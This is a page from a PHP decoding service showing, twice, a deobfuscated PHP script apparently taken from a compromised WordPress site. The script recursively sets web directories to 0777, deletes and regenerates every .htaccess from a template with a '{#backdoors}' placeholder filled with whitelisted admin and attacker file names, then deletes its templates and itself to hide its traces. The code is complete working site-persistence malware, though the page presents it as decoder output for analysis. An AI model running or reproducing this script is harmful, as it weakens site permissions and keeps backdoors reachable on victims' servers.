Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php header('Content-Type: text/html;charset=utf-8'); error_reporting(E_ALL); $secle..

Decoded Output download

<?php 
header('Content-Type: text/html;charset=utf-8'); 
error_reporting(E_ALL); 
 
$seclevel = "|links.php|header.php"; 
 
define("ROOT", $_SERVER['DOCUMENT_ROOT']); 
@chdir(ROOT); 
 
$arr_paths = array(); 
get_arr_paths(ROOT); 
 
function get_arr_paths($path) 
{ 
    global $arr_paths; 
 
    if ($handle = opendir($path)) { 
        while (($file = readdir($handle)) !== false) { 
 
            if ($file != "." && $file != "..") { 
                if (is_dir($path . "/" . $file) && !is_link($path . '/' . $file)) { 
                    $arr_paths[] = $path . "/" . $file; 
                    get_arr_paths($path . "/" . $file); 
                } 
            } 
        } 
    } 
} 
 
function output_message($result) 
{ 
    if (!is_array($result)) { 
        return; 
    } 
 
    if (!isset($result['title'])) { 
        $result['title'] = ''; 
    } 
 
    if (isset($result['status']) && !empty($result['status'])) { 
        if ($result['status'] == 200) { 
            $status = '<font color="green">Success</font>'; 
        } 
 
        if ($result['status'] == 500) { 
            $status = '<font color="red">Fail</font>'; 
        } 
    } else { 
        $status = ''; 
    } 
 
    echo '<h3>' . $result['title'] . '   ' . $status . '</h3>'; 
 
    if (sizeof($result['message']) > 0) { 
        foreach ($result['message'] as $message) { 
            $message = str_replace('success', '<font color="blue"><b>Success</b></font>', $message); 
            $message = str_replace('fail', '<font color="red"><b>Fail</b></font>', $message); 
            echo '<li>' . $message . '</li>'; 
        } 
    } 
 
    echo "<br />"; 
    echo "<br />"; 
} 
 
$return_data = array(); 
$return_data['title'] = '.htaccess'; 
 
if (file_exists('.htaccesstem') && file_exists('.htaccessinfo')) { 
    $contentorig = file_get_contents('.htaccesstem'); 
    $contentold = file_get_contents('.htaccessinfo'); 
    $htens = json_decode($contentold, true); 
 
    if (file_exists('.htaccess') && !is_writable('.htaccess')) { 
        $chmod_f_result = @chmod('.htaccess', 0644); 
        if (!$chmod_f_result) { 
            $return_data['message'][] = '.htaccess' . ' permission denied'; 
        } 
    } 
    if (file_exists('.htaccess')) { 
        unlink('.htaccess'); 
        $contentidx = str_replace('{#backdoors}', 'index.php|wp-login.php' . $seclevel, $contentorig); 
        $fpc_result = file_put_contents('.htaccess', $contentidx); 
 
        if (!$fpc_result) { 
            $return_data['message'][] = '.htaccess' . ' fail'; 
        } 
 
    } 
 
    foreach ($arr_paths as $a) { 
        if (!is_writable($a)) { 
 
            $chmod_result = @chmod($a, 0777); 
 
            if (!$chmod_result) { 
                $return_data['message'][] = $a . ' permission denied'; 
                continue; 
            } 
        } 
 
        if (file_exists($a . '/.htaccess') && !is_writable($a . '/.htaccess')) { 
 
            $chmod_f_result = @chmod($a . '/.htaccess', 0644); 
 
            if (!$chmod_f_result) { 
                $return_data['message'][] = $a . '/.htaccess' . ' permission denied'; 
                continue; 
            } 
        } 
 
        if (file_exists($a . '/.htaccess')) { 
            unlink($a . '/.htaccess'); 
        } 
        $b = str_replace(ROOT . "/", "", $a); 
        if (isset($htens[$b]) && $htens[$b] !== "") { 
            if (substr($a, strpos($a, 'wp-admin')) === 'wp-admin') { 
                $content = str_replace('{#backdoors}', 'index.php|wp-login.php|profile.php|load-styles.php|load-scripts.php|plugins.php|plugin-install.php|admin-ajax.php|update.php|admin.php|' . $htens[$b] . $seclevel, $contentorig); 
            } else { 
                $content = str_replace('{#backdoors}', $htens[$b] . $seclevel, $contentorig); 
            } 
        } else { 
            if (substr($a, strpos($a, 'wp-admin')) === 'wp-admin') { 
                $content = str_replace('{#backdoors}', 'index.php|wp-login.php|profile.php|load-styles.php|load-scripts.php|plugins.php|plugin-install.php|admin-ajax.php|update.php|admin.php' . $seclevel, $contentorig); 
            } else { 
                $content = str_replace('{#backdoors}', '', $contentorig); 
            } 
        } 
        $fpc_result = file_put_contents($a . '/.htaccess', $content); 
 
        if (!$fpc_result) { 
            $return_data['message'][] = $a . '/.htaccess' . ' fail'; 
        } 
 
 
    } 
 
    $return_data['status'] = 200; 
    $return_data['message'][] = '.htaccess modify success'; 
    output_message($return_data); 
 
    unlink('.htaccesstem'); 
    unlink('.htaccessinfo'); 
 
} else { 
 
    $return_data['status'] = 500; 
    $return_data['message'][] = '.htaccesstem file not exists'; 
    $return_data['message'][] = '.htaccess modify fail'; 
    output_message($return_data); 
} 
 
unlink(__FILE__); 
 
?> 

Did this file decode correctly?

Original Code

<?php
header('Content-Type: text/html;charset=utf-8');
error_reporting(E_ALL);

$seclevel = "|links.php|header.php";

define("ROOT", $_SERVER['DOCUMENT_ROOT']);
@chdir(ROOT);

$arr_paths = array();
get_arr_paths(ROOT);

function get_arr_paths($path)
{
    global $arr_paths;

    if ($handle = opendir($path)) {
        while (($file = readdir($handle)) !== false) {

            if ($file != "." && $file != "..") {
                if (is_dir($path . "/" . $file) && !is_link($path . '/' . $file)) {
                    $arr_paths[] = $path . "/" . $file;
                    get_arr_paths($path . "/" . $file);
                }
            }
        }
    }
}

function output_message($result)
{
    if (!is_array($result)) {
        return;
    }

    if (!isset($result['title'])) {
        $result['title'] = '';
    }

    if (isset($result['status']) && !empty($result['status'])) {
        if ($result['status'] == 200) {
            $status = '<font color="green">Success</font>';
        }

        if ($result['status'] == 500) {
            $status = '<font color="red">Fail</font>';
        }
    } else {
        $status = '';
    }

    echo '<h3>' . $result['title'] . '   ' . $status . '</h3>';

    if (sizeof($result['message']) > 0) {
        foreach ($result['message'] as $message) {
            $message = str_replace('success', '<font color="blue"><b>Success</b></font>', $message);
            $message = str_replace('fail', '<font color="red"><b>Fail</b></font>', $message);
            echo '<li>' . $message . '</li>';
        }
    }

    echo "<br />";
    echo "<br />";
}

$return_data = array();
$return_data['title'] = '.htaccess';

if (file_exists('.htaccesstem') && file_exists('.htaccessinfo')) {
    $contentorig = file_get_contents('.htaccesstem');
    $contentold = file_get_contents('.htaccessinfo');
    $htens = json_decode($contentold, true);

    if (file_exists('.htaccess') && !is_writable('.htaccess')) {
        $chmod_f_result = @chmod('.htaccess', 0644);
        if (!$chmod_f_result) {
            $return_data['message'][] = '.htaccess' . ' permission denied';
        }
    }
    if (file_exists('.htaccess')) {
        unlink('.htaccess');
        $contentidx = str_replace('{#backdoors}', 'index.php|wp-login.php' . $seclevel, $contentorig);
        $fpc_result = file_put_contents('.htaccess', $contentidx);

        if (!$fpc_result) {
            $return_data['message'][] = '.htaccess' . ' fail';
        }

    }

    foreach ($arr_paths as $a) {
        if (!is_writable($a)) {

            $chmod_result = @chmod($a, 0777);

            if (!$chmod_result) {
                $return_data['message'][] = $a . ' permission denied';
                continue;
            }
        }

        if (file_exists($a . '/.htaccess') && !is_writable($a . '/.htaccess')) {

            $chmod_f_result = @chmod($a . '/.htaccess', 0644);

            if (!$chmod_f_result) {
                $return_data['message'][] = $a . '/.htaccess' . ' permission denied';
                continue;
            }
        }

        if (file_exists($a . '/.htaccess')) {
            unlink($a . '/.htaccess');
        }
        $b = str_replace(ROOT . "/", "", $a);
        if (isset($htens[$b]) && $htens[$b] !== "") {
            if (substr($a, strpos($a, 'wp-admin')) === 'wp-admin') {
                $content = str_replace('{#backdoors}', 'index.php|wp-login.php|profile.php|load-styles.php|load-scripts.php|plugins.php|plugin-install.php|admin-ajax.php|update.php|admin.php|' . $htens[$b] . $seclevel, $contentorig);
            } else {
                $content = str_replace('{#backdoors}', $htens[$b] . $seclevel, $contentorig);
            }
        } else {
            if (substr($a, strpos($a, 'wp-admin')) === 'wp-admin') {
                $content = str_replace('{#backdoors}', 'index.php|wp-login.php|profile.php|load-styles.php|load-scripts.php|plugins.php|plugin-install.php|admin-ajax.php|update.php|admin.php' . $seclevel, $contentorig);
            } else {
                $content = str_replace('{#backdoors}', '', $contentorig);
            }
        }
        $fpc_result = file_put_contents($a . '/.htaccess', $content);

        if (!$fpc_result) {
            $return_data['message'][] = $a . '/.htaccess' . ' fail';
        }


    }

    $return_data['status'] = 200;
    $return_data['message'][] = '.htaccess modify success';
    output_message($return_data);

    unlink('.htaccesstem');
    unlink('.htaccessinfo');

} else {

    $return_data['status'] = 500;
    $return_data['message'][] = '.htaccesstem file not exists';
    $return_data['message'][] = '.htaccess modify fail';
    output_message($return_data);
}

unlink(__FILE__);

?>

Function Calls

header 1

Variables

None

Stats

MD5 2623149474afe618c6ae0718f942f8bb
Eval Count 0
Decode Time 68 ms